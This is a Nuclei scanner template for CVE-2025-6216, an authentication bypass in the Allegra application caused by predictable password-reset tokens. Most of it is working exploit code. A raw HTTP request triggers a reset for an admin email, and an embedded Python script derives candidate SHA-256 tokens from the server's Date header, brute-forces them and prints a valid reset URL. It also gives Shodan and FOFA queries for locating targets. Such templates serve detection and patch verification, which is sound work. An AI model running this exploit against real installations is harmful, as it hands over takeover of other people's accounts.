id: CVE-2025-6216

info:
  name: Allegra - Authentication Bypass via Predictable Password Reset Token
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Allegra calculateTokenExpDate Password Recovery Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of Allegra. Authentication is not required to exploit this vulnerability. The specific flaw exists within the password recovery mechanism. The issue results from reliance upon a predictable value when generating a password reset token. An attacker can leverage this vulnerability to bypass authentication on the application.
  impact: |
    An attacker can exploit this vulnerability to bypass authentication and gain unauthorized access to the application, potentially compromising sensitive data and system integrity.
  remediation: |
    Upgrade Allegra to version 8.1.4 or 7.5.2 or later to fix the predictable password reset token vulnerability.
  reference:
    - https://www.zerodayinitiative.com/advisories/ZDI-25-410/
    - https://alltena.com/en/resources/release-notes/release-notes-for-release-8-1-4-and-release-7-5-2
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6216
  classification:
    epss-score: 0.52525
    epss-percentile: 0.97986
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-6216
    cwe-id: CWE-640
    cpe: cpe:2.3:a:alltena:allegra:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: alltena
    product: allegra
    shodan-query: http.favicon.hash:"284403119"
    fofa-query: icon_hash="284403119"
  tags: cve,cve2025,allegra,auth-bypass,predictable-token,reset,vuln

variables:
  email: "admin@mydomainxxx.com" # Change to a test account

flow: http(1) && code()

http:
  - raw:
      - |
        POST /resetPassword.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        email={{email}}&fromAjax=true&_dc=1750669432104&perspectiveType=&appActionID=

    extractors:
      - type: regex
        name: date_header
        part: header
        internal: true
        group: 1
        regex:
          - "Date: (.*)"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "emailSent"
          - '"success":true'
        condition: and

      - type: status
        status:
          - 200

code:
  - engine:
      - py
      - python3 # requires python to be pre-installed on system running nuclei
    source: |
      import requests
      import hashlib, os
      from email.utils import parsedate_to_datetime

      def main():
          BASE_URL = os.getenv("BaseURL")
          EMAIL = os.getenv("email")
          # Date header extracted from the resetPassword.action response by the http step
          date_header = os.getenv("date_header")
          if not BASE_URL or not date_header:
              return
          # parsedate_to_datetime raises on malformed input rather than returning None
          server_time = parsedate_to_datetime(date_header)
          server_time_ms = int(server_time.timestamp() * 1000)
          # Expiry is server time plus 28800000 ms; the Date header only carries
          # second precision, so the millisecond component is iterated over
          expiry_time_ms = server_time_ms + 28800000
          base_expiry_sec = (expiry_time_ms // 1000) * 1000
          for ms in range(1000):
              candidate_expiry_ms = base_expiry_sec + ms
              token = hashlib.sha256(str(candidate_expiry_ms).encode()).hexdigest()
              test_url = f"{BASE_URL}/resetPassword!confirm.action?ctk={token}"
              r = requests.get(test_url, allow_redirects=False)
              if 'com.trackplus.app.logon.ResetPasswordApplication' in r.text:
                  print(test_url)
                  return

      if __name__ == "__main__":
          main()

    matchers:
      - type: dsl
        dsl:
          - contains(code_response, "/resetPassword!confirm.action?ctk=")

    extractors:
      - type: dsl # type of the extractor
        dsl:
          - '"Reset URL: " + code_response'
# digest: 4a0a0047304502207b0782b57e05d58f2ad4dc3c9c0f6da93d134328989e9d9f269f4b8fe16066bc022100eb80e40e37a6b7dd68b0aef9e0ee4b61e0373eef43f9bdc6c6d7f4744c60ad4c:922c64590222798bb761d5b6d8e72950